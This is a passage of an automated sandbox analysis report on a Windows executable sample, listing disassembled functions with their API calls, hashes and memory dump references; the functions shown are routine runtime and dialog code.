                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 45606e32d7371be60a3d17b497886e5de3a285a783f8a3e9a1fc6a900ed56b7b
                  • Instruction ID: a366e619ca05b4604f990df342c9fe91129f723c43d81e2ca08d5c5881d2eed7
                  • Opcode Fuzzy Hash: 45606e32d7371be60a3d17b497886e5de3a285a783f8a3e9a1fc6a900ed56b7b
                  • Instruction Fuzzy Hash: BA41B232A003049FDB24DF78C981AAEB7F6EF85714F1545A9E515EB281DB31AD42CB80
                  Function 00A1B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 00A1B619
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A1B63C
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A1B662
                  • _free.LIBCMT ref: 00A1B675
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A1B684
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: a8c9af7dd8740cab74b275b279c61396a1407082cff7c6aa74ca08df720c9a0c
                  • Instruction ID: b58e6e0610bfe3ee3af3a26a91e0a56bde8b43cb6dbb873743d36ce703c6bd96
                  • Opcode Fuzzy Hash: a8c9af7dd8740cab74b275b279c61396a1407082cff7c6aa74ca08df720c9a0c
                  • Instruction Fuzzy Hash: 97018473611215BF673157BA6C8CCFB6A6EDEE7BA03150229B955C3110DF748D4292B0
                  Function 00A19029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,?,00A1895F,00A185FB,?,00A18FD3,00000001,00000364,?,00A13713,00000050,?,00A30EE8,00000200), ref: 00A1902E
                  • _free.LIBCMT ref: 00A19063
                  • _free.LIBCMT ref: 00A1908A
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A19097
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A190A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 47f756e4cb79108a9ebb241621fb38360d574d7c53a6c149ff626f3122ece9b1
                  • Instruction ID: dff80f35dcce93808e34cde45d027f1c5a2e7e91e9efd1d3c3f2c2bb03134d95
                  • Opcode Fuzzy Hash: 47f756e4cb79108a9ebb241621fb38360d574d7c53a6c149ff626f3122ece9b1
                  • Instruction Fuzzy Hash: 66017D32205B006B8331A3B86D95DFB262F9BD93713240138F41A93251EF28CCC3D020
                  Function 00A0075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A00A41: ResetEvent.KERNEL32(?), ref: 00A00A53
                    • Part of subcall function 00A00A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A00A67
                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A0078F
                  • CloseHandle.KERNEL32(?,?), ref: 00A007A9
                  • DeleteCriticalSection.KERNEL32(?), ref: 00A007C2
                  • CloseHandle.KERNEL32(?), ref: 00A007CE
                  • CloseHandle.KERNEL32(?), ref: 00A007DA
                    • Part of subcall function 00A0084E: WaitForSingleObject.KERNEL32(?,000000FF,00A00A78,?), ref: 00A00854
                    • Part of subcall function 00A0084E: GetLastError.KERNEL32(?), ref: 00A00860
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                  • String ID:
                  • API String ID: 1868215902-0
                  • Opcode ID: 56a0779edf21c7ecd5cf602f76fd9ab617e9d87e3ddbd07a745fded58d7d0005
                  • Instruction ID: ec4e2606afd5af73dd6f12f0bcecb20fe1d4cb20f49beeccc9578f1f6d49be22
                  • Opcode Fuzzy Hash: 56a0779edf21c7ecd5cf602f76fd9ab617e9d87e3ddbd07a745fded58d7d0005
                  • Instruction Fuzzy Hash: 3E01B972544708EFCB31DB69ED84FD6BBE9FB45710F000529F19A421A0CB796646CB60
                  Function 00A1BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00A1BF28
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A1BF3A
                  • _free.LIBCMT ref: 00A1BF4C
                  • _free.LIBCMT ref: 00A1BF5E
                  • _free.LIBCMT ref: 00A1BF70
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 30583986c70c958c435b1efe35885a62a91d313f46579ab2b437ae520febb8fb
                  • Instruction ID: b7a364e1898a8a5c38e65ee0909a52354914d1d34e4f723d2ffcf57adf59ea2b
                  • Opcode Fuzzy Hash: 30583986c70c958c435b1efe35885a62a91d313f46579ab2b437ae520febb8fb
                  • Instruction Fuzzy Hash: C2F01D32518201AB8630EBA8EF86CAA73E9BB147107648919F048D7914CF34FCC38A64
                  Function 00A18060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00A1807E
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A18090
                  • _free.LIBCMT ref: 00A180A3
                  • _free.LIBCMT ref: 00A180B4
                  • _free.LIBCMT ref: 00A180C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: aa12d1bc6c27db090dbe35d6c9e8343f59b155e0c0af3f342924877806e87d4a
                  • Instruction ID: 0e36372d198154c7fa9d61899cefff5dd2876fb98fabc7483f3b4b8ed9375557
                  • Opcode Fuzzy Hash: aa12d1bc6c27db090dbe35d6c9e8343f59b155e0c0af3f342924877806e87d4a
                  • Instruction Fuzzy Hash: B0F03A74801325AB8721EF99BD015A93BA5F7247227084A2AF40497E74CF3908D39FC1
                  Function 00A176BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DFpUKTL6kg.exe,00000104), ref: 00A176FD
                  • _free.LIBCMT ref: 00A177C8
                  • _free.LIBCMT ref: 00A177D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\DFpUKTL6kg.exe
                  • API String ID: 2506810119-349794724
                  • Opcode ID: 3099efcc2d46a3b315dcab00643dc85c589bea01cda1ccf5c32309f7b76e3a71
                  • Instruction ID: 3ff3bb9b5e090bdcd9867e84165488ae518c4f971230440c9ba7ecfa2ea728cf
                  • Opcode Fuzzy Hash: 3099efcc2d46a3b315dcab00643dc85c589bea01cda1ccf5c32309f7b76e3a71
                  • Instruction Fuzzy Hash: 83317271A04318AFDB21DF99DD81EEEBBFCEB95710F144166F80497651DA704E81CB90
                  Function 009F7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F7579
                    • Part of subcall function 009F3B3D: __EH_prolog.LIBCMT ref: 009F3B42
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 009F7640
                    • Part of subcall function 009F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 009F7C04
                    • Part of subcall function 009F7BF5: GetLastError.KERNEL32 ref: 009F7C4A
                    • Part of subcall function 009F7BF5: CloseHandle.KERNEL32(?), ref: 009F7C59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                  • API String ID: 3813983858-639343689
                  • Opcode ID: 2bb64e80e5cad76d00811ac618ce2f9b4bf9f30c927fa55fce64fb0f4129d353
                  • Instruction ID: aa987ff44810cf030e734625d58f7eacf351898773d48eda0f3287d3f2a32a92
                  • Opcode Fuzzy Hash: 2bb64e80e5cad76d00811ac618ce2f9b4bf9f30c927fa55fce64fb0f4129d353
                  • Instruction Fuzzy Hash: BC31BE71A0824CAEDF20EBE8ED01FFEBB68AF55314F004069F645E7182DB704A45CBA1
                  Function 00A0A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0A4B8
                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A0A4CD
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A0A4E2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: ASKNEXTVOL
                  • API String ID: 445417207-3402441367
                  • Opcode ID: 9365d4bec4439a640254b66a595905caf3652256320d79a812efdb464d72a286
                  • Instruction ID: b0ec28a6c28f3cea008de3f4922d90920663144d9d82ccb9c208dda225c7a29f
                  • Opcode Fuzzy Hash: 9365d4bec4439a640254b66a595905caf3652256320d79a812efdb464d72a286
                  • Instruction Fuzzy Hash: F6119036244318AFD621DFA8ED49F6A37A9FB9B701F140114F3419B0E0C7A39902D766
                  Function 009FD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: __fprintf_l_strncpy
                  • String ID: $%s$@%s
                  • API String ID: 1857242416-834177443
                  • Opcode ID: 059f9953e1dd495528bf3fe0e184742a70e8332c5b488250ad4e83b2beb5c9ee
                  • Instruction ID: ab9e3901ed5d5ff576ce34fa07111d020433cc7cfda210900db2705d88fc83dd
                  • Opcode Fuzzy Hash: 059f9953e1dd495528bf3fe0e184742a70e8332c5b488250ad4e83b2beb5c9ee
                  • Instruction Fuzzy Hash: C721A13240120CAAEF20DFA4CD06FEE7BADAF05300F040522FB2096192E375DA95DB91
                  Function 00A0A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0A9DE
                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A0A9F6
                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A0AA24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: GETPASSWORD1
                  • API String ID: 445417207-3292211884
                  • Opcode ID: b8f4f87382bc40cc3f0ae8cfe2b36b91c9c3b884cfc12e3ec58e24dc2c818aae
                  • Instruction ID: b83ab3ca5ece74237600f41fb75786bca18cdadcba651cac2a52c34510484191
                  • Opcode Fuzzy Hash: b8f4f87382bc40cc3f0ae8cfe2b36b91c9c3b884cfc12e3ec58e24dc2c818aae
                  • Instruction Fuzzy Hash: 2911A532A4031C7ADB219BA8AD49FFA7B7CEB6A791F010021FA45A20D0C2619D55D7A2
                  Function 009FB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • _swprintf.LIBCMT ref: 009FB51E
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • _wcschr.LIBVCRUNTIME ref: 009FB53C
                  • _wcschr.LIBVCRUNTIME ref: 009FB54C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                  • String ID: %c:\
                  • API String ID: 525462905-3142399695
                  • Opcode ID: f04bb2defaf0bee5abf0fdb7cb47733ba1c5e2bbb809759a2e24d4a7f268d63e
                  • Instruction ID: 92ae8f6761c70cec3fdf03e4c6503e4e07fc7dd6b499450a26578220a0c11764
                  • Opcode Fuzzy Hash: f04bb2defaf0bee5abf0fdb7cb47733ba1c5e2bbb809759a2e24d4a7f268d63e
                  • Instruction Fuzzy Hash: 0801F953904329BACB206F75DC42D7BB7ACDF953B07504816FA55C6081FB28D940C3A1
                  Function 00A006BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,009FABC5,00000008,?,00000000,?,009FCB88,?,00000000), ref: 00A006F3
                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,009FABC5,00000008,?,00000000,?,009FCB88,?,00000000), ref: 00A006FD
                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,009FABC5,00000008,?,00000000,?,009FCB88,?,00000000), ref: 00A0070D
                  Strings
                  • Thread pool initialization failed., xrefs: 00A00725
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                  • String ID: Thread pool initialization failed.
                  • API String ID: 3340455307-2182114853
                  • Opcode ID: 61f04e58b0e13848cdd4931fb626ddbc4ff2a6d773318ce5bfbfaefd0d244675
                  • Instruction ID: a6dc123fa28527de3659c8f27b01d33a666c994002587040422c23dab2e24cb5
                  • Opcode Fuzzy Hash: 61f04e58b0e13848cdd4931fb626ddbc4ff2a6d773318ce5bfbfaefd0d244675
                  • Instruction Fuzzy Hash: 5F1173B2504708AFC3315F69E884AA7FBECEF95754F10482EF1DA82240D6B56981CB64
                  Function 00A0D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: RENAMEDLG$REPLACEFILEDLG
                  • API String ID: 0-56093855
                  • Opcode ID: 0837152e5501b6b529110ab79279e67c275ad9e7f912e25d44296fe78eb8bbc2
                  • Instruction ID: 3f8b344defd0abbdc8e0baa203f8062f94057cb03ecca72f1dd9ee13f5abd0d3
                  • Opcode Fuzzy Hash: 0837152e5501b6b529110ab79279e67c275ad9e7f912e25d44296fe78eb8bbc2
                  • Instruction Fuzzy Hash: 1501BC76A0034DAFCB11CFE8FD44E5A3BA9F749791B004425F905922B0C7729C51EBA2
                  Function 00A191DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                  • Instruction ID: 855e325af083650c116a6c2d307578ab3ea791503c52d5cbca58fff6dd6552b3
                  • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                  • Instruction Fuzzy Hash: 14A14672A003869FEB21CF68C8A17EFBBE5EF55350F18456DE4959B281C2389982C751
                  Function 009FA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,009F80B7,?,?,?), ref: 009FA351
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,009F80B7,?,?), ref: 009FA395
                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,009F80B7,?,?,?,?,?,?,?,?), ref: 009FA416
                  • CloseHandle.KERNEL32(?,?,00000000,?,009F80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 009FA41D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
